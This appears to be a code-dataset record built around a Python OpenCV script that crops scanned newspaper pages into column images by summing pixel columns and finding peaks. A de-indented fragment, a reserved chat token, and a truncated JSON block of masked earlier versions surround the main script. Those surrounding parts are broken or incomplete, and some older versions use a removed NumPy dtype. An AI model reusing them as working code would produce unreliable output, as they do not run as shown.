cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',
test_img)
"""
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
"""
if __name__ == '__main__':
print('STARTING')
for f in os.listdir('./ocr/data/gb19gw39h/'):
if f.endswith('.jpg'):
createColumnImages(cv2.imread(os.path.join(
'./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0],
'./ocr/columns/gb19gw39h/')
for f in os.listdir('./ocr/data/8k71pf94q/'):
if f.endswith('.jpg'):
createColumnImages(cv2.imread(os.path.join(
'./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0],
'./ocr/columns/8k71pf94q/')
for f in os.listdir('./ocr/data/mc87rq85m/'):
if f.endswith('.jpg'):
createColumnImages(cv2.imread(os.path.join(
'./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0],
'./ocr/columns/mc87rq85m/')
"""
data_folder = './ocr/data/'
for folder in os.listdir(data_folder):
if folder == ".DS_Store":
continue
for file in os.listdir(os.path.join(data_folder, folder)):
if file.endswith(".jpg"):
print("calling test() on " + file)
#test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])
createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')
for f in os.listdir('./ocr/data/8k71pr786/'):
if f.endswith(".jpg"):
for d in range(550, 850, 50):
createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)
#createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')
"""
<|reserved_special_token_1|>
# https://github.com/jscancella/NYTribuneOCRExperiments/blob/master/findText_usingSums.py
import os
import io
from pathlib import Path
import sys
os.environ['OPENCV_IO_ENABLE_JASPER']='True' # has to be set before importing cv2 otherwise it won't read the variable
import numpy as np
import cv2
import subprocess
from multiprocessing import Pool
from scipy.signal import find_peaks, find_peaks_cwt
import scipy.ndimage as ndimage
from IPython.display import Image as KImage
# Custom 9x9 dilation kernel used to blend together text in the Y axis:
# a single vertical line of ones, so dilation smears white (text) pixels
# vertically only, merging adjacent lines of text within a column while
# leaving the whitespace gutters between columns untouched.
DILATE_KERNEL = np.array([
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype=np.uint8)
# Run adaptative thresholding (slow compared to not using it in the pipeline,
# though the window-sum step is now vectorized instead of a Python double loop)
def adaptative_thresholding(img, threshold):
    """
    Binarize a BGR image with window-mean adaptive thresholding.

    Args:
        img: BGR image (numpy array) as loaded by cv2.imread.
        threshold: percentage in [0, 100]; a pixel goes black when its gray
            value falls at or below (100 - threshold)% of its local window mean.

    Returns:
        uint8 binary image (values 0 or 255) with the same height/width as img.
    """
    # Convert image to grayscale
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Original image size
    orignrows, origncols = gray.shape
    # Window size: roughly 1/16th of the image in each dimension
    M = int(np.floor(orignrows / 16) + 1)
    N = int(np.floor(origncols / 16) + 1)
    # Image border padding related to window size
    Mextend = round(M / 2) - 1
    Nextend = round(N / 2) - 1
    # Pad by reflection so windows near the border stay well-defined
    aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=Nextend,
                             right=Nextend, borderType=cv2.BORDER_REFLECT)
    windows = np.zeros((M, N), np.int32)
    # Integral image (summed-area table) enables O(1) window sums
    imageIntegral = cv2.integral(aux, windows, -1)
    # Integral image size
    nrows, ncols = imageIntegral.shape
    # Cumulative window sum per pixel via the standard four-corner
    # summed-area-table formula. Vectorized replacement for the former
    # Python double loop (identical values, orders of magnitude faster).
    result = np.zeros((orignrows, origncols))
    rows = min(nrows - M, orignrows)
    cols = min(ncols - N, origncols)
    result[:rows, :cols] = (imageIntegral[M:M + rows, N:N + cols]
                            - imageIntegral[:rows, N:N + cols]
                            + imageIntegral[:rows, :cols]
                            - imageIntegral[M:M + rows, :cols])
    # Output binary image. NOTE: np.bool was removed in NumPy 1.24; the
    # builtin bool is the correct dtype here.
    binar = np.ones((orignrows, origncols), dtype=bool)
    # Gray image weighted by window size so it compares against window sums
    graymult = gray.astype('float64') * M * N
    # Pixels at or below the scaled local mean become black
    binar[graymult <= result * (100.0 - threshold) / 100.0] = False
    # bool -> uint8 {0, 255}
    binar = (255 * binar).astype(np.uint8)
    return binar
def Q_test(sorted_data):
    """
    Dixon's Q test (95% confidence) for whether the smallest value of an
    ascending-sorted sequence is an outlier.

    Args:
        sorted_data: sequence of numbers sorted in ascending order.

    Returns:
        True if the gap between the two smallest values, relative to the full
        range, exceeds the 95% critical value for the sample size (capped at
        n=9). Returns False for fewer than 3 points or zero range, where the
        test is undefined (the original raised KeyError / ZeroDivisionError).
    """
    if len(sorted_data) < 3:
        return False  # Q test needs at least 3 observations
    data_range = abs(sorted_data[-1] - sorted_data[0])
    if data_range == 0:
        return False  # all values identical: no outlier possible
    # Critical values at 95% confidence, indexed by sample size (3..9)
    conf95_level = {3: .97, 4: .829, 5: .71, 6: .625, 7: .568, 8: .526, 9: .493}
    gap = abs(sorted_data[1] - sorted_data[0])
    q_exp = gap / data_range
    print(str(gap) + ' / ' + str(data_range))
    print("q_exp : " + str(q_exp))
    return q_exp > conf95_level[min(9, len(sorted_data))]
# static variables for clarity
COLUMNS = 0  # axis argument for np.sum: summing over axis 0 yields one total per image column
GREEN = (0, 255, 0)  # BGR color used to outline detected columns in debug images
# parameters that can be tweaked
LINE_THICKNESS = 3  # how thick to make the line around the found contours in the debug output
PADDING = 10  # padding to add around the found possible column to help account for image skew and such
CREATE_COLUMN_OUTLINE_IMAGES = True  # if we detect that we didn't find all the columns, create a debug image showing the columns that were found
def columnIndexes(a):
    """
    Pair each column boundary with its successor, producing the left and
    right x-index of every image column.

    For example [13, 1257, 2474, 3695, 4907, 6149]
    becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]
    """
    # Stack the array against itself shifted by one: row i is (a[i], a[i+1]).
    return np.column_stack((a[:-1], a[1:]))
def convertToGrayscale(img):
    """Return a single-channel grayscale copy of a BGR image."""
    return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
def invert(img):
    """Invert a grayscale image: black -> white, white -> black."""
    print("invert image")
    # Threshold of 140 chosen by experiment (3/18/21); pixels above it map
    # to 0 and the rest to 255 (binary-inverse thresholding).
    inverted = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)[1]
    return inverted
def dilateDirection(img, debug=False):
    """
    Dilate the image with the vertical DILATE_KERNEL.

    Dilation is the opposite of erosion: a pixel becomes white ('1') if at
    least one pixel under the kernel is white, so white regions grow. With a
    purely vertical kernel the growth happens only along the Y axis, joining
    broken parts of text within a column.
    """
    print("applying dilation morph")
    # More iterations stretch the text further in Y; 15 seems about right.
    return cv2.dilate(img, DILATE_KERNEL, iterations=15)
def createColumnImages(img, basename, directory):
    """
    Split a newspaper page image into per-column crops written to disk.

    We sum each column of the inverted image; the columns should show up as
    peaks in the sums. Uses scipy.signal.find_peaks to find those peaks and
    uses them as column x-indexes.

    Args:
        img: BGR page image as loaded by cv2.imread.
        basename: filename prefix for the written column crops.
        directory: output directory; created on demand if missing.

    Returns:
        List of file paths of the cropped column images that were written.
    """
    files = []
    temp_img = convertToGrayscale(img)
    temp_img = invert(temp_img)
    temp_img = dilateDirection(temp_img)
    # One sum per x position; column gutters (dark after inversion) give low sums.
    sums = np.sum(temp_img, axis = COLUMNS)
    sums[0] = 1000 # some random value so that find_peaks properly detects the peak for the left most column
    sums = sums * -4 # invert so that minimums become maximums and exagerate the data so it is more clear what the peaks are
    peaks, _ = find_peaks(sums, distance=600) # the column indexes of the img array, spaced at least 600 apart from the previous peak
    sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))
    sorted_sums = sorted(sum_to_index.keys())
    # Q-test outlier-removal experiment, currently disabled:
    '''
    qr = Q_test(sorted_sums)
    if qr:
        peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]
    '''
    print("PeakNum, Sum, QRemove for " + basename)
    for x in peaks:
        print(str(x) + ', ' + str(sums[x]))
    print("----------")
    if peaks.size == 0:
        # No peaks found at all: log the page for manual review and bail out.
        with open('troublesomeImages.txt', 'a') as f:
            print("ERROR: something went wrong with finding the peaks for image: ", os.path.join(directory, basename))
            f.write(os.path.join(directory, basename) + ".jpg 0\n")
        return files
    peaks[0] = 0 # automatically make the left most column index the start of the image
    peaks[-1] =sums.size -1 # automatically make the right most column index the end of the image
    boxed = np.copy(img)
    if peaks.size < 6:
        # Fewer boundaries than expected (presumably a 5-column layout —
        # TODO confirm): record the page for review but keep processing.
        with open('troublesomeImages.txt', 'a') as f:
            print("found image that is causing problems: ", os.path.join(directory, basename))
            f.write(os.path.join(directory, basename) + ".jpg " + str(peaks.size) + "\n")
    columnIndexPairs = columnIndexes(peaks)
    ystart = 0
    yend = img.shape[0]
    for columnIndexPair in columnIndexPairs:
        # Pad each side of the column (clamped to image bounds) to tolerate skew.
        xstart = max(columnIndexPair[0]-PADDING, 0)
        xend = min(columnIndexPair[1]+PADDING, img.shape[1])
        if not os.path.exists(directory):
            os.makedirs(directory)
        filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (basename, xstart,xend))
        files.append(filepath)
        crop_img = img[ystart:yend, xstart:xend]
        print("writing out cropped image: ", filepath)
        # Apply adaptative thresholding to the image with a threshold of 25/100
        #crop_img = adaptative_thresholding(crop_img, 25)
        if not cv2.imwrite(filepath, crop_img):
            print('failed')
        if CREATE_COLUMN_OUTLINE_IMAGES:
            cv2.rectangle(boxed,(xstart,ystart),(xend,yend), GREEN, LINE_THICKNESS)
    if CREATE_COLUMN_OUTLINE_IMAGES:
        # Debug overlay image with every detected column outlined in green.
        filepath = os.path.join(directory, '%s-contours.jpeg' % basename)
        cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])
    # For removing the old image?
    # os.remove(os.path.join(directory, basename + ".jp2"))
    return files
def invert_experiment():
    """Sweep inverse-binary thresholds over one sample page and write each
    result to ./ocr/test_images/ for visual comparison."""
    sample = cv2.imread('./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')
    for thresh in range(1, 200, 20):
        print('writing thresh= ' + str(thresh))
        inverted = cv2.threshold(sample, thresh, 255, cv2.THRESH_BINARY_INV)[1]
        cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg', inverted)
def test(img, basename):
    """
    Scratch/debug helper: run the grayscale -> invert -> dilate pipeline on a
    single page image and write the dilated result to disk for inspection.
    Most of the body is commented-out experiments (cropping, contour drawing,
    rank filtering) kept for reference.
    """
    #h, w, _ = img.shape
    #test_img = cv2.imread('./ocr/data/8k71pf94q/2_commonwealth_8k71pf94q_accessFull.jpg')
    test_img = convertToGrayscale(img)
    #ret,test_img = cv2.threshold(test_img,25,255,0)
    #cv2.imwrite('./ocr/test_images/contours/'+basename+'prepixelcrop.jpg', test_img)
    #test_img = test_img[10:h-10, 10: w-10]
    #y_nonzero, x_nonzero = np.nonzero(test_img)
    #test_img = test_img[np.min(y_nonzero):np.max(y_nonzero), np.min(x_nonzero):np.max(x_nonzero)]
    test_img = invert(test_img)
    test_img = dilateDirection(test_img)
    #contours,hierarchy = cv2.findContours(test_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
    #cnt = contours[0]
    #x,y,w,h = cv2.boundingRect(cnt)
    #test_img = cv2.rectangle(img,(10,10),(w-10, h-10), GREEN, LINE_THICKNESS)
    #test_img = cv2.drawContours(test_img, contours, -1, GREEN, LINE_THICKNESS)
    #crop = test_img[y:y+h,x:x+w]
    cv2.imwrite('./ocr/test_images/contours/'+basename+'dilated.jpg', test_img)
    # Disabled rank-filter sweep experiment:
    '''
    for r in range(0, 40, 5):
        name = 'rank=' + str(r) + ".jpg"
        path = './ocr/test_images/' + name
        new_img = ndimage.rank_filter(test_img, rank=r, size=20)
        print("writing " + name)
        cv2.imwrite(path, new_img)
    '''
    #cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)
#cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)
if __name__ == "__main__":
    print("STARTING")
    # Process three hard-coded newspaper-scan folders. f[0] (the leading page
    # number of each filename) tags the output crops for that page.
    for f in os.listdir('./ocr/data/gb19gw39h/'):
        if f.endswith(".jpg"):
            #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
            createColumnImages(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0], './ocr/columns/gb19gw39h/')
    for f in os.listdir('./ocr/data/8k71pf94q/'):
        if f.endswith(".jpg"):
            #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
            createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0], './ocr/columns/8k71pf94q/')
    for f in os.listdir('./ocr/data/mc87rq85m/'):
        if f.endswith(".jpg"):
            #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
            createColumnImages(cv2.imread(os.path.join('./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0], './ocr/columns/mc87rq85m/')
    # Disabled batch-run experiments (all-folder sweep and peak-distance
    # parameter sweep) kept for reference:
    '''
    data_folder = './ocr/data/'
    for folder in os.listdir(data_folder):
        if folder == ".DS_Store":
            continue
        for file in os.listdir(os.path.join(data_folder, folder)):
            if file.endswith(".jpg"):
                print("calling test() on " + file)
                #test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])
                createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')
    for f in os.listdir('./ocr/data/8k71pr786/'):
        if f.endswith(".jpg"):
            for d in range(550, 850, 50):
                createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)
    #createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')
    '''
|
flexible
|
{
"blob_id": "91d240b02b9d7a6c569656337521482d57918754",
"index": 4333,
"step-1": "<mask token>\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\n<mask token>\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. 
\n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, 
'%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\n<mask token>\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\n<mask token>\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. 
\n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, 
'%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\ndef invert_experiment():\n test_img = cv2.imread(\n './ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _, temp_img = cv2.threshold(test_img, thresh, 255, cv2.\n THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',\n temp_img)\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef adaptative_thresholding(img, threshold):\n I = img\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n orignrows, origncols = gray.shape\n M = int(np.floor(orignrows / 16) + 1)\n N = int(np.floor(origncols / 16) + 1)\n Mextend = round(M / 2) - 1\n Nextend = round(N / 2) - 1\n aux = cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=\n Nextend, right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M, N), np.int32)\n imageIntegral = cv2.integral(aux, windows, -1)\n nrows, ncols = imageIntegral.shape\n result = np.zeros((orignrows, origncols))\n for i in range(nrows - M):\n for j in range(ncols - N):\n result[i, j] = imageIntegral[i + M, j + N] - imageIntegral[i, j + N\n ] + imageIntegral[i, j] - imageIntegral[i + M, j]\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n graymult = gray.astype('float64') * M * N\n binar[graymult <= result * (100.0 - threshold) / 100.0] = False\n binar = (255 * binar).astype(np.uint8)\n return binar\n\n\n<mask token>\n\n\ndef columnIndexes(a):\n \"\"\"\n creates pair of indexes for left and right index of the image column\n For example [13, 1257, 2474, 3695, 4907, 6149]\n becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]\n \"\"\"\n nrows = a.size - 2 + 1\n return a[1 * np.arange(nrows)[:, None] + np.arange(2)]\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. 
\n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair 
